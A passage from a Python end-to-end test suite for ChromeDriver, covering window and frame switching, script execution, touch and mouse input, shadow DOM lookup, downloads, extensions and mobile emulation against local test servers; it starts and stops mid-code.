_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# ChromeShell doesn't support multiple tabs.
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testSwitchToWindow',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
]
)
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome_shell'] + [
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverSendLargeData',
'PerformanceLoggerTest.testPerformanceLogger',
]
)
class ChromeDriverBaseTest(unittest.TestCase):
"""Base class for testing chromedriver functionalities."""
def __init__(self, *args, **kwargs):
super(ChromeDriverBaseTest, self).__init__(*args, **kwargs)
self._drivers = []
def tearDown(self):
for driver in self._drivers:
try:
driver.Quit()
except:
pass
def CreateDriver(self, server_url=None, download_dir=None, **kwargs):
if server_url is None:
server_url = _CHROMEDRIVER_SERVER_URL
android_package = None
android_activity = None
android_process = None
if _ANDROID_PACKAGE_KEY:
android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package
if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell':
android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity
android_process = '%s:main' % android_package
driver = chromedriver.ChromeDriver(server_url,
chrome_binary=_CHROME_BINARY,
android_package=android_package,
android_activity=android_activity,
android_process=android_process,
download_dir=download_dir,
**kwargs)
self._drivers += [driver]
return driver
class ChromeDriverTest(ChromeDriverBaseTest):
"""End to end tests for ChromeDriver."""
@staticmethod
def GlobalSetUp():
ChromeDriverTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
ChromeDriverTest._sync_server = webserver.SyncWebServer()
if _ANDROID_PACKAGE_KEY:
ChromeDriverTest._device = device_utils.DeviceUtils(
android_commands.GetAttachedDevices()[0])
http_host_port = ChromeDriverTest._http_server._server.server_port
sync_host_port = ChromeDriverTest._sync_server._server.server_port
forwarder.Forwarder.Map(
[(http_host_port, http_host_port), (sync_host_port, sync_host_port)],
ChromeDriverTest._device)
@staticmethod
def GlobalTearDown():
if _ANDROID_PACKAGE_KEY:
forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device)
ChromeDriverTest._http_server.Shutdown()
@staticmethod
def GetHttpUrlForFile(file_path):
return ChromeDriverTest._http_server.GetUrl() + file_path
def setUp(self):
self._driver = self.CreateDriver()
def testStartStop(self):
pass
def testLoadUrl(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
def testGetCurrentWindowHandle(self):
self._driver.GetCurrentWindowHandle()
def _WaitForNewWindow(self, old_handles):
"""Wait for at least one new window to show up in 20 seconds.
Args:
old_handles: Handles to all old windows before the new window is added.
Returns:
Handle to a new window. None if timeout.
"""
deadline = time.time() + 20
while time.time() < deadline:
new_handles = self._driver.GetWindowHandles()
if len(new_handles) > len(old_handles):
for index, old_handle in enumerate(old_handles):
self.assertEquals(old_handle, new_handles[index])
return new_handles[len(old_handles)]
time.sleep(0.01)
return None
def testCloseWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.CloseWindow()
self.assertRaises(chromedriver.NoSuchWindow,
self._driver.GetCurrentWindowHandle)
new_handles = self._driver.GetWindowHandles()
for old_handle in old_handles:
self.assertTrue(old_handle in new_handles)
for handle in new_handles:
self._driver.SwitchToWindow(handle)
self.assertEquals(handle, self._driver.GetCurrentWindowHandle())
self._driver.CloseWindow()
def testGetWindowHandles(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
self.assertNotEqual(None, self._WaitForNewWindow(old_handles))
def testSwitchToWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertEquals(
1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;'))
window1_handle = self._driver.GetCurrentWindowHandle()
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.SwitchToWindow('oldWindow')
self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle())
def testEvaluateScript(self):
self.assertEquals(1, self._driver.ExecuteScript('return 1'))
self.assertEquals(None, self._driver.ExecuteScript(''))
def testEvaluateScriptWithArgs(self):
script = ('document.body.innerHTML = "<div>b</div><div>c</div>";'
'return {stuff: document.querySelectorAll("div")};')
stuff = self._driver.ExecuteScript(script)['stuff']
script = 'return arguments[0].innerHTML + arguments[1].innerHTML'
self.assertEquals(
'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1]))
def testEvaluateInvalidScript(self):
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.ExecuteScript, '{{{')
def testExecuteAsyncScript(self):
self._driver.SetTimeout('script', 3000)
self.assertRaises(
chromedriver.ScriptTimeout,
self._driver.ExecuteAsyncScript,
'var callback = arguments[0];'
'setTimeout(function(){callback(1);}, 10000);')
self.assertEquals(
2,
self._driver.ExecuteAsyncScript(
'var callback = arguments[0];'
'setTimeout(function(){callback(2);}, 300);'))
def testSwitchToFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('name')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrameByIndex(0)
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
def testSwitchToParentFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Three' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('One' in self._driver.GetPageSource())
def testExecuteInRemovedFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);'
'window.addEventListener("message",'
' function(event) { document.body.removeChild(frame); });')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.ExecuteScript('parent.postMessage("remove", "*");')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
def testGetTitle(self):
script = 'document.title = "title"; return 1;'
self.assertEquals(1, self._driver.ExecuteScript(script))
self.assertEquals('title', self._driver.GetTitle())
def testGetPageSource(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertTrue('Link to empty.html' in self._driver.GetPageSource())
def testFindElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertTrue(
isinstance(self._driver.FindElement('tag name', 'div'), WebElement))
def testFindElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
divs = self._driver.FindElements('tag name', 'div')
self.assertTrue(isinstance(divs, list))
self.assertEquals(2, len(divs))
for div in divs:
self.assertTrue(isinstance(div, WebElement))
def testFindChildElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";')
element = self._driver.FindElement('tag name', 'div')
self.assertTrue(
isinstance(element.FindElement('tag name', 'br'), WebElement))
def testFindChildElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><br></div>";')
element = self._driver.FindElement('tag name', 'div')
brs = element.FindElements('tag name', 'br')
self.assertTrue(isinstance(brs, list))
self.assertEquals(2, len(brs))
for br in brs:
self.assertTrue(isinstance(br, WebElement))
def testHoverOverElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchFlickElement(self):
dx = 3
dy = 4
speed = 5
flickTouchEventsPerSecond = 30
moveEvents = int(
math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed)
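# With dx=3, dy=4 and speed=5 this evaluates to int(5 * 30 / 5) = 30 expected
# touchmove events; the page script below counts them via its preMove counter.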
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchstart", function() {'
' div.innerHTML = "preMove0";'
'});'
'div.addEventListener("touchmove", function() {'
' res = div.innerHTML.match(/preMove(\d+)/);'
' if (res != null) {'
' div.innerHTML = "preMove" + (parseInt(res[1], 10) + 1);'
' }'
'});'
'div.addEventListener("touchend", function() {'
' if (div.innerHTML == "preMove' + str(moveEvents) + '") {'
' div.innerHTML = "new<br>";'
' }'
'});'
'return div;')
self._driver.TouchFlick(div, dx, dy, speed)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchMovedElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchmove", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchMove(loc['x'] + 1, loc['y'] + 1)
self._driver.TouchUp(loc['x'] + 1, loc['y'] + 1)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElementInSubFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
# Test clicking element in the sub frame.
self.testClickElement()
def testClearElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text" value="abc">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.Clear()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSendKeysToElement(self):
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testGetCurrentUrl(self):
self.assertEquals('data:,', self._driver.GetCurrentUrl())
def testGoBackAndGoForward(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.GoBack()
self._driver.GoForward()
def testDontGoBackOrGoForward(self):
self.assertEquals('data:,', self._driver.GetCurrentUrl())
self._driver.GoBack()
self.assertEquals('data:,', self._driver.GetCurrentUrl())
self._driver.GoForward()
self.assertEquals('data:,', self._driver.GetCurrentUrl())
def testRefresh(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.Refresh()
def testMouseMoveTo(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 10, 10)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div)
self._driver.MouseClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseButtonDownAndUp(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mousedown", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new1<br>";'
'});'
'div.addEventListener("mouseup", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new2<a></a>";'
'});')
self._driver.MouseMoveTo(None, 50, 50)
self._driver.MouseButtonDown()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
self._driver.MouseButtonUp()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testMouseDoubleClick(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 1, 1)
self._driver.MouseDoubleClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testAlert(self):
self.assertFalse(self._driver.IsAlertOpen())
self._driver.ExecuteScript(
'window.setTimeout('
' function() { window.confirmed = confirm(\'HI\'); },'
' 0);')
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('HI', self._driver.GetAlertMessage())
self._driver.HandleAlert(False)
self.assertFalse(self._driver.IsAlertOpen())
self.assertEquals(False,
self._driver.ExecuteScript('return window.confirmed'))
def testShouldHandleNewWindowLoadingProperly(self):
"""Tests that ChromeDriver determines loading correctly for new windows."""
self._http_server.SetDataForPath(
'/newwindow',
"""
<html>
<body>
<a href='%s' target='_blank'>new window/tab</a>
</body>
</html>""" % self._sync_server.GetUrl())
self._driver.Load(self._http_server.GetUrl() + '/newwindow')
old_windows = self._driver.GetWindowHandles()
self._driver.FindElement('tagName', 'a').Click()
new_window = self._WaitForNewWindow(old_windows)
self.assertNotEqual(None, new_window)
self.assertFalse(self._driver.IsLoading())
self._driver.SwitchToWindow(new_window)
self.assertTrue(self._driver.IsLoading())
self._sync_server.RespondWithContent('<html>new window</html>')
self._driver.ExecuteScript('return 1') # Shouldn't hang.
def testPopups(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.ExecuteScript('window.open("about:blank")')
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
def testNoSuchFrame(self):
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame, 'nosuchframe')
self.assertRaises(chromedriver.NoSuchFrame,
self._driver.SwitchToFrame,
self._driver.FindElement('tagName', 'body'))
def testWindowPosition(self):
position = self._driver.GetWindowPosition()
self._driver.SetWindowPosition(position[0], position[1])
self.assertEquals(position, self._driver.GetWindowPosition())
# Resize so the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(300, 300)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
def testWindowSize(self):
size = self._driver.GetWindowSize()
self._driver.SetWindowSize(size[0], size[1])
self.assertEquals(size, self._driver.GetWindowSize())
self._driver.SetWindowSize(600, 400)
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testWindowMaximize(self):
self._driver.SetWindowPosition(100, 200)
self._driver.SetWindowSize(600, 400)
self._driver.MaximizeWindow()
self.assertNotEqual([100, 200], self._driver.GetWindowPosition())
self.assertNotEqual([600, 400], self._driver.GetWindowSize())
# Set size first so that the window isn't moved offscreen.
# See https://code.google.com/p/chromedriver/issues/detail?id=297.
self._driver.SetWindowSize(600, 400)
self._driver.SetWindowPosition(100, 200)
self.assertEquals([100, 200], self._driver.GetWindowPosition())
self.assertEquals([600, 400], self._driver.GetWindowSize())
def testConsoleLogSources(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/console_log.html'))
logs = self._driver.GetLog('browser')
self.assertEquals(len(logs), 2)
self.assertEquals(logs[0]['source'], 'network')
self.assertEquals(logs[1]['source'], 'javascript')
def testAutoReporting(self):
self.assertFalse(self._driver.IsAutoReporting())
self._driver.SetAutoReporting(True)
self.assertTrue(self._driver.IsAutoReporting())
url = self.GetHttpUrlForFile('/chromedriver/console_log.html')
self.assertRaisesRegexp(chromedriver.UnknownError,
'.*(404|Failed to load resource).*',
self._driver.Load,
url)
def testContextMenuEventFired(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html'))
self._driver.MouseMoveTo(self._driver.FindElement('tagName', 'div'))
self._driver.MouseClick(2)
self.assertTrue(self._driver.ExecuteScript('return success'))
def testHasFocusOnStartup(self):
    # Some pages (about:blank) cause Chrome to put the focus in the URL bar.
# This breaks tests depending on focus.
self.assertTrue(self._driver.ExecuteScript('return document.hasFocus()'))
def testTabCrash(self):
# If a tab is crashed, the session will be deleted.
    # Once Chrome 31 is released, ChromeDriver will reload the tab instead.
# https://code.google.com/p/chromedriver/issues/detail?id=547
self.assertRaises(chromedriver.UnknownError,
self._driver.Load, 'chrome://crash')
self.assertRaises(chromedriver.NoSuchSession,
self._driver.GetCurrentUrl)
def testDoesntHangOnDebugger(self):
self._driver.ExecuteScript('debugger;')
def testMobileEmulationDisabledByDefault(self):
self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])
def testChromeDriverSendLargeData(self):
script = 's = ""; for (i = 0; i < 10e6; i++) s += "0"; return s;'
lots_of_data = self._driver.ExecuteScript(script)
self.assertEquals('0'.zfill(int(10e6)), lots_of_data)
def testShadowDomFindElementWithSlashDeep(self):
"""Checks that chromedriver can find elements in a shadow DOM using /deep/
css selectors."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
self.assertTrue(self._driver.FindElement("css", "* /deep/ #olderTextBox"))
def testShadowDomFindChildElement(self):
"""Checks that chromedriver can find child elements from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderChildDiv")
self.assertTrue(elem.FindElement("id", "olderTextBox"))
def testShadowDomFindElementFailsFromRootWithoutSlashDeep(self):
"""Checks that chromedriver can't find elements in a shadow DOM without
/deep/."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
# can't find element from the root without /deep/
with self.assertRaises(chromedriver.NoSuchElement):
self._driver.FindElement("id", "#olderTextBox")
def testShadowDomFindElementFailsBetweenShadowRoots(self):
"""Checks that chromedriver can't find elements in other shadow DOM
trees."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #youngerChildDiv")
with self.assertRaises(chromedriver.NoSuchElement):
elem.FindElement("id", "#olderTextBox")
def testShadowDomText(self):
"""Checks that chromedriver can find extract the text from a shadow DOM
element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderHeading")
self.assertEqual("Older Child", elem.GetText())
def testShadowDomSendKeys(self):
"""Checks that chromedriver can call SendKeys on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderTextBox")
elem.SendKeys("bar")
self.assertEqual("foobar", self._driver.ExecuteScript(
'return document.querySelector("* /deep/ #olderTextBox").value;'))
def testShadowDomClear(self):
"""Checks that chromedriver can call Clear on a shadow DOM element."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderTextBox")
elem.Clear()
self.assertEqual("", self._driver.ExecuteScript(
'return document.querySelector("* /deep/ #olderTextBox").value;'))
def testShadowDomClick(self):
"""Checks that chromedriver can call Click on an element in a shadow DOM."""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderButton")
elem.Click()
    # the button's click handler changes the text box's value
self.assertEqual("Button Was Clicked", self._driver.ExecuteScript(
'return document.querySelector("* /deep/ #olderTextBox").value;'))
def testShadowDomStaleReference(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderButton")
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").innerHTML="<div/>";')
with self.assertRaises(chromedriver.StaleElementReference):
elem.Click()
def testShadowDomDisplayed(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._driver.FindElement("css", "* /deep/ #olderButton")
self.assertTrue(elem.IsDisplayed())
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").style.display="None";')
self.assertFalse(elem.IsDisplayed())
class ChromeDriverAndroidTest(ChromeDriverBaseTest):
"""End to end tests for Android-specific tests."""
def testLatestAndroidAppInstalled(self):
if ('stable' not in _ANDROID_PACKAGE_KEY and
'beta' not in _ANDROID_PACKAGE_KEY):
return
self._driver = self.CreateDriver()
try:
omaha_list = json.loads(
urllib2.urlopen('http://omahaproxy.appspot.com/all.json').read())
for l in omaha_list:
if l['os'] != 'android':
continue
for v in l['versions']:
if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY) or
('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
omaha = map(int, v['version'].split('.'))
device = map(int, self._driver.capabilities['version'].split('.'))
self.assertTrue(omaha <= device)
return
raise RuntimeError('Malformed omaha JSON')
except urllib2.URLError as e:
print 'Unable to fetch current version info from omahaproxy (%s)' % e
def testDeviceManagement(self):
self._drivers = [self.CreateDriver() for x in
android_commands.GetAttachedDevices()]
self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
self._drivers[0].Quit()
self._drivers[0] = self.CreateDriver()
class ChromeDownloadDirTest(ChromeDriverBaseTest):
def __init__(self, *args, **kwargs):
super(ChromeDownloadDirTest, self).__init__(*args, **kwargs)
self._temp_dirs = []
def CreateTempDir(self):
temp_dir = tempfile.mkdtemp()
self._temp_dirs.append(temp_dir)
return temp_dir
def tearDown(self):
# Call the superclass tearDown() method before deleting temp dirs, so that
# Chrome has a chance to exit before its user data dir is blown away from
# underneath it.
super(ChromeDownloadDirTest, self).tearDown()
for temp_dir in self._temp_dirs:
shutil.rmtree(temp_dir)
def testFileDownload(self):
download_dir = self.CreateTempDir()
download_name = os.path.join(download_dir, 'a_red_dot.png')
driver = self.CreateDriver(download_dir=download_dir)
driver.Load(ChromeDriverTest.GetHttpUrlForFile(
'/chromedriver/download.html'))
driver.FindElement('id', 'red-dot').Click()
deadline = time.time() + 60
while True:
time.sleep(0.1)
if os.path.isfile(download_name) or time.time() > deadline:
break
self.assertTrue(os.path.isfile(download_name), "Failed to download file!")
def testDownloadDirectoryOverridesExistingPreferences(self):
user_data_dir = self.CreateTempDir()
download_dir = self.CreateTempDir()
sub_dir = os.path.join(user_data_dir, 'Default')
os.mkdir(sub_dir)
prefs_file_path = os.path.join(sub_dir, 'Preferences')
prefs = {
'test': 'this should not be changed',
'download': {
'default_directory': '/old/download/directory'
}
}
with open(prefs_file_path, 'w') as f:
json.dump(prefs, f)
driver = self.CreateDriver(
chrome_switches=['user-data-dir=' + user_data_dir],
download_dir=download_dir)
with open(prefs_file_path) as f:
prefs = json.load(f)
self.assertEqual('this should not be changed', prefs['test'])
download = prefs['download']
self.assertEqual(download['default_directory'], download_dir)
class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.args capabilities.
Makes sure the switches are passed to Chrome.
"""
def testSwitchWithoutArgument(self):
"""Tests that switch --dom-automation can be passed to Chrome.
Unless --dom-automation is specified, window.domAutomationController
is undefined.
"""
driver = self.CreateDriver(chrome_switches=['dom-automation'])
self.assertNotEqual(
None,
driver.ExecuteScript('return window.domAutomationController'))
class ChromeExtensionsCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.extensions."""
def _PackExtension(self, ext_path):
return base64.b64encode(open(ext_path, 'rb').read())
def testExtensionsInstall(self):
"""Checks that chromedriver can take the extensions in crx format."""
crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
self._PackExtension(crx_2)])
def testExtensionsInstallZip(self):
"""Checks that chromedriver can take the extensions in zip format."""
zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])
def testWaitsForExtensionToLoad(self):
did_load_event = threading.Event()
server = webserver.SyncWebServer()
def RunServer():
time.sleep(5)
server.RespondWithContent('<html>iframe</html>')
did_load_event.set()
thread = threading.Thread(target=RunServer)
thread.daemon = True
thread.start()
crx = os.path.join(_TEST_DATA_DIR, 'ext_slow_loader.crx')
driver = self.CreateDriver(
chrome_switches=['user-agent=' + server.GetUrl()],
chrome_extensions=[self._PackExtension(crx)])
self.assertTrue(did_load_event.is_set())
class ChromeLogPathCapabilityTest(ChromeDriverBaseTest):
"""Tests that chromedriver properly processes chromeOptions.logPath."""
LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!'
def testChromeLogPath(self):
"""Checks that user can specify the path of the chrome log.
Verifies that a log message is written into the specified log file.
"""
tmp_log_path = tempfile.NamedTemporaryFile()
driver = self.CreateDriver(chrome_log_path=tmp_log_path.name)
driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE)
driver.Quit()
self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read())
class MobileEmulationCapabilityTest(ChromeDriverBaseTest):
"""Tests that ChromeDriver processes chromeOptions.mobileEmulation.
Makes sure the device metrics are overridden in DevTools and user agent is
overridden in Chrome.
"""
@staticmethod
def GlobalSetUp():
def respondWithUserAgentString(request):
return """
<html>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
def respondWithUserAgentStringUseDeviceWidth(request):
return """
<html>
<head>
<meta name="viewport" content="width=device-width,minimum-scale=1.0">
</head>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
MobileEmulationCapabilityTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgent', respondWithUserAgentString)
MobileEmulationCapabilityTest._http_server.SetCallbackForPath(
'/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth)
@staticmethod
def GlobalTearDown():
MobileEmulationCapabilityTest._http_server.Shutdown()
def testDeviceMetricsWithStandardWidth(self):
driver = self.CreateDriver(
mobile_emulation = {
'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3},
'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui'
